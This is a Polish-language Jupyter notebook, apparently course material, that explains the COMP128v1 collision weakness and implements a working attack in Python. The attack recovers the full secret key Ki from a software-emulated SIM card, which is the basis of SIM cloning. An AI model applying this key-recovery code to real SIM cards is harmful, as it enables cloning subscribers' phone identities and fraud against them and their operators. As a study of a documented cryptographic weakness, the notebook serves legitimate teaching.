# Klonowanie kart SIM

Klonowanie jest możliwe tylko dla kart, które mają wbudowany algorytm **COMP128v1**. Pozostałe wersje COMP128 są uważane za bezpieczne.

## COMP128

Wywołanie COMP128 ma postać
$$ (res[4], sesion\_key[8]) = COMP128( secret\_key[16], RAND[16])$$
gdzie w nawiasach podano rozmiary zmiennych wyrażone w bajtach. Klucz sesyjny generowany przez COMP128 ma nominalnie długość $64$ bitów. Jednak algorytmy COMP128v1 i COMP128v2 były tak skontruowane, że 10 najmłodszych bitów jest zerowanych, zatem klucz sesyjny wygenerowany za ich pomocą ma efektywną długość $56$ bitów.

Do obliczania funkcji COMP128 wykorzystano bibliotekę [CryptoMobile](https://github.com/mitshell/CryptoMobile) (w zawartych tam kodach źródłowych `comp128.c` opisano historię ujawnienia tej pierwotnie tajnej funkcji). Poniżej podano kilka wektorów testowych (pobranych z niezależnego źródła) i porównano z wynikami obliczeń


```
|                 Ki               |               RAND               |         [RES Kc]         |
|__________________________________|__________________________________|__________________________|
| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | 00000000000000000000000000000000 | 0E9FF8FF24119D2D4ED18C00 |
| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | 00102030405060708090A0B0C0D0E0F0 | A9D961ADC7633CE8768C4800 |
| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF | C0AED303A34148CBBFA06C00 |
| AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | 000102030405060708090A0B0C0D0E0F | 5D2A043E67B7C5C7C3356C00 |
```

Poniższy kod źródłowy pokazuje jak sprawdzić poprawność działania wykorzystywanej implementacji.

In [1]:
import binascii
from pycomp128 import comp128v1
Ki = binascii.unhexlify(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
RAND = binascii.unhexlify(b'00000000000000000000000000000000')
res, Kc = comp128v1(Ki, RAND)
print("Ki:", binascii.hexlify(Ki), "RAND:", binascii.hexlify(RAND), "out:", binascii.hexlify(res+Kc))
RAND = binascii.unhexlify(b'00102030405060708090A0B0C0D0E0F0')
res, Kc = comp128v1(Ki, RAND)
print("Ki:", binascii.hexlify(Ki), "RAND:", binascii.hexlify(RAND), "out:", binascii.hexlify(res+Kc))
RAND = binascii.unhexlify(b'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF')
res, Kc = comp128v1(Ki, RAND)
print("Ki:", binascii.hexlify(Ki), "RAND:", binascii.hexlify(RAND), "out:", binascii.hexlify(res+Kc))
RAND = binascii.unhexlify(b'000102030405060708090A0B0C0D0E0F')
res, Kc = comp128v1(Ki, RAND)
print("Ki:", binascii.hexlify(Ki), "RAND:", binascii.hexlify(RAND), "out:", binascii.hexlify(res+Kc))



Ki: b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' RAND: b'00000000000000000000000000000000' out: b'0e9ff8ff24119d2d4ed18c00'
Ki: b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' RAND: b'00102030405060708090a0b0c0d0e0f0' out: b'a9d961adc7633ce8768c4800'
Ki: b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' RAND: b'ffffffffffffffffffffffffffffffff' out: b'c0aed303a34148cbbfa06c00'
Ki: b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' RAND: b'000102030405060708090a0b0c0d0e0f' out: b'5d2a043e67b7c5c7c3356c00'


## Teoria

W publikacjach [Handschuh, H., Paillier, P. (2000). Reducing the Collision Probability of Alleged Comp128](https://link.springer.com/chapter/10.1007/10721064_34) (istotny jest wstęp) i [Wray S. (2003). COMP128: A Birthday Surprise](http://www.stuartwray.net/comp128-a-birthday-surprise-rev.pdf) (sekcja 2 opisuje przebieg ataku)
dość dokładnie przeanalizowano działanie algorytmu i przebieg ataku.
Jego ideę pozwalającą na odzyskanie bajtów $K_i[0]$ i $K_i[8]$ klucza zapisanego na karcie można streścić następująco

1. Wybieramy dowolną wartość początkową $RAND$. 
2. W tym punkcie odpytujemy **kartę SIM** o wynik obliczeń. W liczbie $RAND$ zmieniamy tylko bajty $RAND[0]$ i $RAND[8]$ (kolejne warianty liczby oznaczmy jako $RAND_k$). Bajty zmieniamy aż do momentu znalezienia kolizji, tj. gdy znajdziemy dwie różne $RAND_1$ i $RAND_2$, które dają ten sam wynik obliczeń:
$$ sim(RAND_1) == sim(RAND_2)\ . $$
3. Gdy wyczerpane zostaną wszystkie kombinacje, a kolizji nie będzie, to wracamy do pkt. 1 i wybieramy nowy $RAND$. Gdy dla kilku $RAND$ się nie powiedzie, to znaczy, że klucz $K_i$ nie jest podatny na atak (patrz publikacje). W przeciwnym razie mamy dwie wartości $RAND_1$ i $RAND_2$, które dają kolizję dla nieznanego klucza. Występowanie kolizji jest uwarunkowane głównie wartościami bajtów $K_i[0]$ i $K_i[8]$ (na tym właśnie polega słabość *COMP128v1*). Możemy zatem poszukać tej pary bajtów, nie dbając o wartość pozostałych bajtów klucza.
4. Teraz do obliczeń używamy funkcji *COMP128v1*. Zaczynamy od pewnego dowolnego $K$, w którym zmieniamy wartości bajtów $K[0]$ i $K[8]$. Oznaczmy kolejne warianty testowego klucza przez $K_n$. Naszym celem jest znalezienie takich wartości $K_n[0]$ i $K_n[8]$, które zapewniają kolizję, tzn.
$$ comp128v1( K_n, RAND_1) == comp128v1( K_n, RAND_2)\ . $$
Bajty $K_n[0]$ i $K_n[8]$, które zapewniają kolizję, są z dużym prawdopodobieństwem tożsame z bajtami klucza zapisanego na karcie SIM tj. z $K_i[0]=K_n[0]$ i $K_i[8]=K_n[8]$.
5. Wracamy do punktu 1. i poszukujemy wartości bajtów $K_i[1]$ i $K_i[9]$. Proces powtarzamy, aż do znalezienia wszystkich bajtów klucza zapisanego na karcie.

Złożoność ataku nie jest duża. Na każdą parę bajtów klucza musimy wykonać $2^{16}$ wywołań karty SIM i $2\times 2^{16}$ obliczeń *COMP128v1*. Podstawowe ograniczenie czasowe wynika z powolnej komunikacji z kartą SIM. Gdy karta SIM jest symulowana programowo, jak w poniższym przykładzie, to atak przebiega bardzo szybko.


## Implementacja

### Struktury danych

`comp128_query` to adaptacja implementacji bibliotecznej. `comp128_query` zwraca wynik obliczeń jako jeden ciąg bajtów, bez rozbicia na elementy składowe. 

`SimCard` to klasa emulująca zachowanie karty SIM. W konstruktorze podajemy klucz (który jest niedostępny dla algorytmu łamiącego). Obiekt ma jedną metodę obliczającą odpowiedź na wyzwanie $RAND$.

In [2]:
import binascii
from pycomp128 import comp128v1

def comp128_query(key, rand):
  tuple = comp128v1(key, rand)
  return tuple[0]+tuple[1]
  
class SimCard:
  def __init__(self, secret_key):
    self.key = secret_key
  def a3a8( self, rand ):
    return comp128_query(self.key, rand)

Sim = SimCard(binascii.unhexlify(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'))

test_challenges = (b'00000000000000000000000000000000', b'00102030405060708090A0B0C0D0E0F0', b'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF', b'000102030405060708090A0B0C0D0E0F')
for challengestr in test_challenges:
  challenge = binascii.unhexlify(challengestr)
  response = Sim.a3a8( challenge )
  print("Sim response:", binascii.hexlify( response ))
print("Prównaj z wynikami wcześniejszych obliczeń")

Sim response: b'0e9ff8ff24119d2d4ed18c00'
Sim response: b'a9d961adc7633ce8768c4800'
Sim response: b'c0aed303a34148cbbfa06c00'
Sim response: b'5d2a043e67b7c5c7c3356c00'
Prównaj z wynikami wcześniejszych obliczeń


## Emulacja karty SIM

Kartę SIM, którą dalej będziemy atakować, inicjujemy losowym kluczem tajnym (tak przynajmniej powinien zachować się operator, czy tak jest — nie wiadomo, bo wartości kluczy nie są znane użytkownikom). Wartość klucza jest zapamiętana w zmiennej dla poźniejszego porównania.

**Pamiętaj!** atak nie działa dla wszystkich kluczy. Jeżeli się nie powiedzie, wróć tutaj i wylosuj klucz ponownie.

In [3]:
import os
K_i = os.urandom(16)
print("K_i:", binascii.hexlify( K_i ), "K_i[0]:", hex(K_i[0]), "K_i[8]:", hex(K_i[8]) )
Sim =  SimCard( K_i )

K_i: b'8163e40f6c9f150253c16a7ac127af93' K_i[0]: 0x81 K_i[8]: 0x53


## Poszukiwanie kolizji dla wyzwań RAND przy ustalonym kluczu $K_i$

Poszukujemy liczb RAND dających kolizję i różniących się między sobą tylko na 0-wym i 8-mym bajcie.  

In [4]:
import os,sys

rand_k = bytearray(os.urandom(16))
print("RAND pattern:",binascii.hexlify(rand_k))
dictionary = {}
rand_collision = False

for num in range(0xffff+1):
  num_as_bytes = num.to_bytes(2,sys.byteorder)
  rand_k[0]=num_as_bytes[0]
  rand_k[8]=num_as_bytes[1]
  # odpowiedzi przedstawione są jako ciągi znaków,
  # aby łatwo móc się posłużyć obiektem słownika
  response = binascii.hexlify( Sim.a3a8( bytes(rand_k) ) )
  if response in dictionary: # mamy kolizję, zapisz liczby i zakończ
    rand1=dictionary.get(response)
    rand2=binascii.hexlify( rand_k )
    rand_collision=True
    break
  else: # brak kolizji, zapisz do słownika, wyzwania i odpowiedzi konwertowane są na ciągi znaków
    dictionary[response]=binascii.hexlify( rand_k )
if ( rand_collision ):
  print("Collision found!")
else:
  print("No collision!")
print(num,hex(num))
print(len(dictionary))

RAND pattern: b'21d0f9e882b6f3a2866f86d5f20f7852'
Collision found!
35426 0x8a62
35426


Powyższy fragment można uruchomić wiele razy. Proszę zwrócić uwagę, że liczba iteracji niezbędnych do znalezienia kolizji **NIE ZALEŻY** od wyboru początkowej wartości RAND (można wybrać same zera!), zależy natomiast od postaci klucza na karcie SIM (aby to zobaczyć, trzeba się wrócić dwa kroki w tył i ponownie wylosować klucz).

## Poszukiwanie klucza dającego kolizję

Z poprzedniego punktu mamy wyzwania zapewniające kolizję. Występowanie kolizji jest zależne tylko od właściwości klucza. 
Z dużym prawdopodobieństwem kolizja jest zdeterminowana tylko przez bajty $K_i[0]$ i $K_i[8]$.
Aby je wyznaczyć, zaczynamy od dowolnego klucza i poszukujemy zestawu bajtów $K_i[0]$ i $K_i[8]$, które dają kolizję.

In [5]:
rnd1 = binascii.unhexlify(rand1)
rnd2 = binascii.unhexlify(rand2)
K_n = bytearray(16) #bytearray(os.urandom(16))
for keybytes in range(0xffff+1):
  keybytes_as_bytes = keybytes.to_bytes(2,sys.byteorder)
  K_n[0]=keybytes_as_bytes[0]
  K_n[8]=keybytes_as_bytes[1]
  resp1 = comp128_query(bytes( K_n ), rnd1) # wartości rand1 i rand2 pochodzą z poprzedniego punktu
  resp2 = comp128_query(bytes( K_n ), rnd2)
  if ( resp1 == resp2 ): # collision found
    print("resp1:", binascii.hexlify( resp1 ) )
    print("resp2:", binascii.hexlify( resp2 ) )
    print("Alleged key bytes: K_n[0]=", hex(K_n[0]), "K_n[8]=", hex(K_n[8]))
    print("SECRET  key bytes: K_i[0]:", hex(K_i[0]), "K_i[8]:", hex(K_i[8]) )
    break
if ( keybytes == 0xffff ):
  print("Search failed")

Search failed


## Odzyskanie całego klucza

W poprzednich punktach odzyskaliśmy bajty "K_i[0]" i "K_i[8]" tajnego klucza zapisanego na karcie SIM. Pozostałe bajty klucza odzyskujemy, powtarzając powyższą procedurę dla bajtów "RAND_k[n]" i "RAND_k[n+8]" oraz "K_i[n]" i "K_i[n+8]" dla $n=1,\ldots,7$.

Zdefiniujmy poprzednie zabiegi mające na celu znalezienie kolizji jako podfunkcje.

In [6]:
def findRands( Sim, index):
  rand_k = bytearray(os.urandom(16))
  #rand_k = bytearray(16)
  dictionary = {}
  rand_collision = False
  for num in range(0xffff+1):
    num_as_bytes = num.to_bytes(2,sys.byteorder)
    rand_k[0+index]=num_as_bytes[0]
    rand_k[8+index]=num_as_bytes[1]
    response = binascii.hexlify( Sim.a3a8( bytes(rand_k) ) )
    if response in dictionary:
      rand1=dictionary.get(response)
      rand2=binascii.hexlify( rand_k )
      return rand1, rand2
    else:
      dictionary[response]=binascii.hexlify( rand_k )
  return

def findKeyBytes(rnd1,rnd2,index):
  sample_key = bytearray(16) #bytearray(os.urandom(16))
  for keybytes in range(0xffff+1):
    keybytes_as_bytes = keybytes.to_bytes(2,sys.byteorder)
    sample_key[0+index]=keybytes_as_bytes[0]
    sample_key[8+index]=keybytes_as_bytes[1]
    if ( comp128_query(bytes(sample_key), rnd1) == comp128_query(bytes(sample_key), rnd2) ): # collision found
      #print (hex(keybytes_as_bytes[0]),hex(keybytes_as_bytes[1]))
      return keybytes_as_bytes[0], keybytes_as_bytes[1]  
  #print ("No matching key bytes found")
  return # no key found


Poniższy kod ilustruje odzyskiwanie kolejnych bajtów tajnego klucza.

In [7]:
def BreakingSIM( sim ):
  AllegedKey=bytearray(16)
  print("Initial key")
  print(binascii.hexlify( AllegedKey ))
  for k in range(8):
    rands = findRands(Sim,k)
    if rands:
      keybytes = findKeyBytes(binascii.unhexlify(rands[0]),binascii.unhexlify(rands[1]),k)
      if keybytes:
        AllegedKey[k]=keybytes[0]
        AllegedKey[8+k]=keybytes[1]  
        print(binascii.hexlify( AllegedKey ))
      else:
        print("Key not found on pos:", k )
        AllegedKey[k]=0
        AllegedKey[8+k]=0  
        print(binascii.hexlify( AllegedKey ))
    else:
      print("Rands not found on pos:", k )
      AllegedKey[k]=0
      AllegedKey[8+k]=0  
      print(binascii.hexlify( AllegedKey ))
  return AllegedKey


**Pamiętaj!** Nie wszystkie klucze są podatne. Być może będziesz musiał uruchomić poniższy fragment kilkukrotnie.

In [8]:
import os,sys,binascii
from pycomp128 import comp128v1
K_i = os.urandom(16)
#K_i = binascii.unhexlify(b'200a09e23623ff3a16858054defe97c2')
print("Secret key K_i")
print(binascii.hexlify( K_i ))
Sim =  SimCard( K_i )
AllegedKey = BreakingSIM( Sim )
print("Done. Compare with the secret key.")


Secret key K_i
b'052a3c3b8ae78270525c966ece681542'
Initial key
b'00000000000000000000000000000000'
b'05000000000000005200000000000000'
b'052a000000000000525c000000000000'
b'052a3c0000000000525c960000000000'
b'052a3c3b00000000525c966e00000000'
b'052a3c3b8a000000525c966ece000000'
b'052a3c3b8ae70000525c966ece680000'
b'052a3c3b8ae78200525c966ece681500'
b'052a3c3b8ae78270525c966ece681542'
Done. Compare with the secret key.
